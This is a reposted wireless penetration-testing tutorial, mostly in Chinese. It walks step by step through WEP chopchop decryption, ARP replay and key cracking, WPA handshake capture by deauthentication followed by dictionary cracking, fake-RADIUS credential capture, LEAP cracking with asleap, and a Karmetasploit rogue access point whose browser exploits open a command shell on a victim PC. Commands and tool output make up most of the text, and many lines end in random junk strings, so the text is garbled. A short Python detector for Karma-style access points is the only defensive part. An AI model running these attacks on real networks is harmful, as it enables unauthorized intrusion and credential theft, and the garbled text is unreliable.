#aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0 Aireplay-ng 将挑选一个数据包进行解密。 8YQ7XB
*hh9 K
响应如下所示: csV3mzP
u5Mg
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11 %q6I-
JW"n#sR4
#q5tG\gnM
Size: 90, FromDS: 1, ToDS: 0 (WEP) N$u: !
D'#,%4P,e\
BSSID = 00:1B:2F:3D:CB:D6 k7]4TIUD*
Dest. MAC = 00:1A:73:37:E2:A3 .R^ R|<x
Source MAC = 00:1B:2F:3D:CB:D6 "`h.8=-
V 7D<'!
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=.. -J0I2D
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N +W8kMuM!
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'.. +jO#?J
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K... @~FJlG(n
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC. w=^~M[%w
0x0050: b09b f0f1 8b04 fc1c 0b72.............................. ...r y( UWh4?t
U&SSc@of
Use this packet ? =% |f-x
rl-#Ez
;u<F,o(
我们仍然键入“y”。 olm'_ {{
C~PP}|<~V
E!`/XB/nA
Use this packet ? y =6N=5JePB
,+x\NY2d
Equ%6x
然后系统进行解密。 O#<S\66
iZ0(a
Saving chosen packet in replay_src-0223-211242.cap xXJzE|)1h!
?.ofs}
.ts XQf
Offset 87 ( 3% done) | xor = 4E | pt = 3C | Ds@K%f(.?w
Offset 86 ( 5% done) | xor = 16 | pt = 1D | P<9T.l
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 7w\!3pv
Offset 84 ( 8% done) | xor = 97 | pt = 6B | "V,dH%&j
Offset 83 (10% done) | xor = 0E | pt = 0A | QwuSo{G
Offset 82 (12% done) | xor = 86 | pt = 0D | &m{~4]qWpM
tq*{Hil>P`
$G Vf;M2*
64 frames written in 1097ms }( WUZ^L
119 frames written in 2029ms lg@q} ]1
146 frames written in 2476ms u@zT~\ h*
239 frames written in 4068ms Ae<;b Of
228 frames written in 3865ms qLB(Th\&'
273 frames written in 4646ms NNRKYdp,
+ Cq&~<B
" j:15m5
x/ P\qI
lPz5.(5'
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms h5))D!
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms RP wP4Z
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms <"S/M]9
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms @Tsdgx8
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms r\|" j8
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms L/O:V^1
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms ;giT[KK
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms \0l"9 B.
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms }iR!uhi#
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms uTP4r
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms j<i: rk|
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms f/=H#'+8
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms $EuI2.o
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms .fS1
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms eadY(-4|I-
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms ((Wq
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms o=do L{ #
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms e +O0l
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms 'I)E.DoF
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms lD)QB!*v
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms jhSc9
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms _{'HY+M
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms ]]bL;vlw
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms Y<-dd"\
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms K)t+lJ
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms HzF]hm,
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms &`[Dl(W
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms p)=Fi}#D\
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms ^ $t7p 1
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms O WVa&8O
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms U GJ# "9
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms mam2]St"
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms 9:tKRN_D
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms 2@S{e$YK`
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms f ^f{tOX
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms P:y M j&)
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms Yxt`Uvc(^h
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms \f_YJit
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms RHGs (d7-
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms uiIY,FL$
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms Td5;bg6Qy
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms QviH+9
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms ;Qc_Tf=,
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms ?B2 T'}~
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms iS^IqS
FU|c[u|z
The AP appears to drop packets shorter than 37 bytes. n^;:V8k
Enabling standard workaround: IP header re-creation. el*C8TWlw
Cu0N/hBT
ozbu|9 +v
UNJ]$x0
eM*@zo<-
This doesn't look like an IP packet, try another one. [e+"G <>
XTD _q
Warning: ICV checksum verification FAILED! Trying workaround. 42?X)n>
The AP appears to drop packets shorter than 40 bytes. SR#X\AWM
Enabling standard workaround: IP header re-creation. [{ak&{R,9{
n_%JXm#\
Saving plaintext in replay_dec-0223-211410.cap xr) Rx{)3h
Saving keystream in replay_dec-0223-211410.xor z./M^7v?
xQa[bvW
Completed in 21s (2.48 bytes/s) !Jw
#~54t0|Cd>
这一过程由 xor 文件和 cap 文件产生。xor 文件包含密钥流;cap 文件包含解密数据包。 &_ Ewu@4
M=$y_9#
MPMJkL$F^
'}*5ee](S
z]> 0A
[0x05f] - 数据包伪造 FS r `Y
W{l+_a{/9
Re('7m h~
创建加密的数据包形式 PRGA(XOR)从 ChopChop 或碎片得到。 FfN==2:b
!'Xk=+
mCe,(/>l+
#Packetforge-ng -0 - a xx:xx:xx:xx:xx:xx - h yy:yy:yy:yy:yy:yy - k X~Uvh8O
255.255.255.255 -y replay_dec-0223-211410.xor -w arp |Sy |E
g.X?wyg5
其结果是: m1=3@>
`h( JD$w
Wrote packet to: arp |cJyP9}n
cu]2`DF
8HdmG{7.
从这个命令中,我们得到 ARP 请求数据包中的文件名为“arp”。 )M LOYX
C',D"
9zEO$<e o
]x?9lQ1&
zF.rsNY
[0x05g] - 交互式 ARP 重播*** g AC}
/K:M ,q
z)=D&\HX
我们使用 aireplay 注入 ARP 请求数据包到接入点。通过输入下面的命令。 wt[MzpRP
Byyus[b'A
#aireplay-ng -2 -r arp rausb0 b-U LoV
n`? j. s
响应将如下所示所示: cfMj^*I
NQ !t`
Size: 68, FromDS: 0, ToDS: 1 (WEP) 5Y#yz>B@ ]
R8F[ 7&(
BSSID = 00:1B:2F:3D:CB:D6 s\1h=V)!H
Dest. MAC = FF:FF:FF:FF:FF:FF ~;QO`I=0P
Source MAC = 00:21:27:C0:07:71 "'p:M,:
\$T
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q f ySzZ
vXLiYWo
;RB]awE
255.255.255.255 - l j1*'yvGM
8 ]]uk=P
LoSblV
Mg W0 ).
{3@f(H m
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334........... ..U....N.4 /@X!
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l; A&jkc'
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~ S3EY9:^ C
0x0040: 66bf 700e f.p. %/"I.\%d
D)U 9xA)J
Use this packet ? x :\+{-
G|Rsj{2'
m~'!
我们回应“y”。 8om6wALXB
&l"/G%W
Use this packet ? y E;/WP!/.
"XlNKBgM
aireplay-ng 开始注入数据包。 Q^prHn*@
C]414Ibi
x? tC2L
Saving chosen packet in replay_src-0223-211755.cap U$v|c%6
You should also start airodump-ng to capture replies. p4GhT~)l:
7rQwn2XD{
Sent 1200 packets...(499 pps) k>E^FB=
i)y8MlC{
,`PC^`0c}o
p[R4!if2
mSLA4[4{
?+av9;Kg
[0x05h] - 破解 WEP 密钥 7irpD7P>
在我们收集足够的加密包之后,我们使用 aircrack-ng 来恢复密钥。 zU7co.G
#aircrack-ng -z capture1.cap (PTW Attack) Em)U`"j/9
!q\MXS($#u
成功地破解结果如下所示: F t/yPv
QO2@K1Y
Opening capture1.cap _U.|$pU
Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. ! Gob `# r
KEY FOUND! [ 00:11:22:33:44 ] &O +?#3
Decrypted correctly: 100% YI+ clh;%9
0JFS%Yjw[
^h\(j*/#X
Q g~cYwX
Ri>4:V3K
'0-YFx'U0V
[0x06] - 破解 WEP 的总结脚本 "@z X{^:
Az7 ] qb
6am g*=]
Note: $AP 是接入点的 MAC 地址 W4;/;[/L
$WIFI 是 WIFI 网卡的 MAC 地址 IOA2/ WQu
- airmon-ng start wlan0 11 (监控模式必须确定具体频道)- airodump-ng -c 11 -w capture1.cap wlan0 uMx6:
za%gD
rJZR8bo
cY5w,.Q/!
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0 - aireplay-ng -4 -b $AP -h $WIFI wlan0 7}:+Yx
If Not Work!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0 !4-4i
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request Vwu dNjL
- aireplay-ng -2 -r arp-request wlan0 wz'=
- aircrack-ng -z capture1.cap F r!FV4
vgE -t
** 这些方法可用于客户端的 WEP 破解。 fat;5XL@
@R-11wP)M
U9ZuD40\
2X<%BFsE
-woFKAy`
[0x07] - 拥有 WPA-PSK/WPA2-PSK 密钥 o$eo\X?J?
d~AL4~}
=z;]FauR!
PSK 代表 Pre-Shared 密钥。这些机制的改善从而解决了 WEP 的脆弱性。 CT5s`v!s
因此,它能够使用相同的破解 WEP 方式来破解密钥。只有这样,才能恢复 WPA-PSK 或 WPA2-PSK,也就是说获取4 次握手并利用字典***的破解。 G^N@ r:RS
这个主意破解 Pre-shared 密钥是收集四次握手包。我们能够做到这一点,去验证相关的客户端。这种方式将迫使客户端进行重新验证,我们可以在这个进程中进行四次握手。验证命令如下所示:#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0 U?an\rv
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 ; PncJe5x
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs] YA@MLZm
我猜想我们获取了这一进程 workshop.cap 文件。所以,我们使用 aircrack 进行破解。#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap .%y'q!?
成功的结果如下所示: Cdy,8*
T60pw
Opening test-02.cap <}:` Y"
Read 252 packets. Q^ZM|(s#
>{QO$F#
# BSSID ESSID Encryption #bBh. ^
4d%0a%Z
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake) O^3kPVr
E_En"r)y
Choosing first network as target. F$(ak;v}
5L:-Xr{
Opening workshop-02.cap oz>2P.7
Reading packets, please wait... t))MZw&@
PWyf3
(T0MWp0
5LB{b]w7m
?!&%-R6*
Aircrack-ng 1.0 rc1 r1085 | bz%SB
6IG?t
8'zZVX D<
[00:00:00] 0 keys tested (0.00 k/s) Ac|\~w[\
hK{H7Ey*
7n6g;8xE
KEY FOUND! [ TheFuckinWPAKey ] IO)#O<
{?eU AB<
>4jE[$p]"
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4 X)[tb]U/Wx
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63 /@k#tdj
Si>38vCJ*
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6 qU7_%Z
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2 }I&.xzJ
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86 ~2"hh$
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1 Q2 VF+g ,
]a4U\yr
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D (c(F1=K
Bzrnmz5S
zHb [.ry~
从这个结果中可以看出,它意味着 WPA-PSK/WPA2-PSK 密钥是“TheFuckinWPAKey”。 =Z
W5 F\e[Ax5
p H y
T U0-L35P1
;>v.(0FE6
[0x08] - 无线网企业漏洞利用 (WPA-TLS/TTLS/PEAP) Dcvul4Q
E$)|Kv^
大多数公司转向使用公共密钥加密的无线网络,他们认为这是绝对安全的。但是,狡猾的***者***这一系统仍然是由欺骗证书。 A)&FcMO*z
这种***方法是一种利用客户端信息。许多客户端接受认证而不考虑它是否是真正的证书或没有证书。这使***者冒充自己是 RADIUS 服务器和 Loggin 凭证资料的受害者。 ={O ~
我们可以使用 Freeradius 伪装 Radius 服务器与 WPE 补丁结合,使 Loggin 凭证资料到 Freeradius 服务器。附加说明: http://www.willhackforsushi.com/FreeRADIUS_WPE.html ( 2 HM "Pd
ETdXk&AN
<?nIO
/I`TN5~
[0x09] - Cisco LEAP exploitation

Cisco's proprietary Lightweight Extensible Authentication Protocol (LEAP) is a wireless authentication process intended to close security holes: it provides user-based authentication and can generate dynamic WEP keys. Cisco LEAP is a designated 802.1X Extensible Authentication Protocol (EAP) type.

LEAP is easy to deploy and manage, and offers features such as:
- Mutual authentication
- User-based authentication
- Dynamic WEP keys
Reposted from: 神秘小强's blog, QQ group: 29097418

We find that the username is sent to the RADIUS server in cleartext, while the password captured in Wireshark is encrypted; even so, it is just as easy to exploit. asleap is a tool for recovering weak LEAP and PPTP passwords; asleap can perform:

- Recovery of weak LEAP and PPTP passwords
- Deauthentication of clients on the WLAN (to speed up LEAP password recovery), using the AIRJACK driver

Download asleap: http://asleap.sourceforge.net/

Step one: use asleap's genkeys to build the required database (.dat) and index (.idx) files:

#./genkeys -r dict -f dict.dat -n dict.idx

dict = Our wordlist/dictionary file, with one word per line
dict.dat = Our new output pass+hash file (generated as a result of running this command)
dict.idx = Our new output index filename (generated as a result of running this command)

#./genkeys -r dictionary -f dict.dat -n dict.idx

genkeys 1.4 - generates lookup file for asleap. < mailto:jwright@hasborg.com >
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.

The last step is to recover the weak LEAP password: run asleap against the capture using the newly created .dat and .idx files:

#./asleap -r data/leap.dump -f dict.dat -n dict.idx

leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used)
dict.dat = Our output pass+hash file (generated with genkeys, see above)
dict.idx = Our new output index filename (generated with genkeys, see above)

#./asleap -r data/leap.dump -f dict.dat -n dict.idx

asleap 1.4 - actively recover LEAP/PPTP passwords. < mailto:jwright@hasborg.com >
Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...

Note: the success rate depends on the size of the dictionary.

asleap 2.2 now includes the "-C" and "-R" options to specify the challenge and response as delimited hex bytes. With these options, asleap becomes a generic MS-CHAPv2 cracking tool.

[0x10] - Karmetasploit mass exploitation

HD Moore has published instructions ( http://trac.metasploit.com/wiki/Karmetasploit ) on getting Karmetasploit working with the framework.

Karmetasploit can bring up a fake AP that clients connect to. The attacker can then log cookies, FTP and HTTP credentials, authentication information and so on, and can also exploit browser vulnerabilities on the client machines.

This method was tested on BackTrack 3 (final).

1. Update aircrack-ng

$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install
2. Let's test that aireplay-ng works (your wireless card must support packet injection):

bt# aireplay-ng -9 wlan0
15:10:21 Trying broadcast probe requests...
15:10:21 Injection is working!
15:10:25 Found 5 APs

15:10:25 Trying directed probe requests...
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
15:10:35 0/30: 0%
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
15:10:42 0/30: 0%

15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
15:10:48 5/30: 60%
15:10:48 Injection is working!

15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
15:56:53 0/30: 0%

Injection is now working!

3. Update Metasploit

$ svn co http://metasploit.com/svn/framework3/trunk msf3

4. Download the bash script http://www.darkoperator.com/kmsapng.tgz

The script does the following:
- Changes the MAC address of the interface
- Puts the interface into monitor mode
- Starts the Karma AP with airbase-ng
- Changes the interface MTU size
- Sets the IP address
- Starts the DHCPD server
- Sets up the iptables redirects
- Starts Metasploit

6. Then we run kmsapng.sh, like this:

#./kmsapng.sh -i wlan0 -m km -s linksys

Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ...
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit

=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux

resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.

[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493...
[*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)

msf auxiliary(http) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

D:\Mozilla Firefox> cd ..

D:\> net user

\\CZY 的用户帐户

__vmware_user__ Administrator ASPNET
Guest HelpAssistant IUSR_CWH
IWAM_CZY CZY SUPPORT_388945a0
命令成功完成。

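The Karma AP started by the script above answers every probe request with whatever SSID the client asked for, which is the behaviour a wireless IDS can key on. The following is an added example, not part of this guide, of Karmetasploit or of airbase-ng, that flags a BSSID claiming many different SSIDs or answering a random canary SSID that no honest AP could know; the probe-response records are constructed, with the rogue's MAC taken from the kmsapng.sh output above.

```python
from collections import defaultdict
import secrets

ROGUE = "00:40:1b:5b:b0:0b"      # faked MAC from the kmsapng.sh output above
REAL_AP = "00:14:06:11:42:a2"    # the 'WORKSHOP' AP from the injection test
# A random SSID that nobody advertises: only a Karma-style AP answers it.
CANARY = "canary-" + secrets.token_hex(4)

# Constructed (bssid, ssid) pairs taken from captured probe-response frames.
# The rogue echoes whatever SSIDs nearby clients probe for; the real AP
# answers only with its own network name.
PROBE_RESPONSES = [
    (REAL_AP, "WORKSHOP"), (REAL_AP, "WORKSHOP"),
    (ROGUE, "WORKSHOP"), (ROGUE, "linksys"), (ROGUE, "CITEC"),
    (ROGUE, "VICTIM"), (ROGUE, "Mywifi"), (ROGUE, CANARY),
]

def karma_suspects(responses, canary, max_ssids=3):
    """Return {bssid: reason} for BSSIDs that behave like a Karma AP: they
    answered the canary probe, or they claimed more than `max_ssids` distinct
    SSIDs (a real AP advertises one, or a handful of virtual ones)."""
    ssids = defaultdict(set)
    for bssid, ssid in responses:
        ssids[bssid].add(ssid)
    suspects = {}
    for bssid, names in ssids.items():
        if canary in names:
            suspects[bssid] = "answered canary SSID %r" % canary
        elif len(names) > max_ssids:
            suspects[bssid] = "claims %d SSIDs: %s" % (
                len(names), ", ".join(sorted(names)))
    return suspects

if __name__ == "__main__":
    for bssid, why in karma_suspects(PROBE_RESPONSES, CANARY).items():
        print(f"possible Karma AP {bssid}: {why}")
```
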
[0x11] - End of the journey

All of the operations were carried out in a Linux environment; in any case, I hope it is of some help to you.

This article was written for the exchange of technical knowledge and for legitimate penetration testing purposes; the author is not responsible for any damage caused by using its contents. If you want to use these techniques on someone else's systems, you must obtain their consent or do so as legitimate penetration testing.
Reposted from: https://blog.51cto.com/changfei041/290588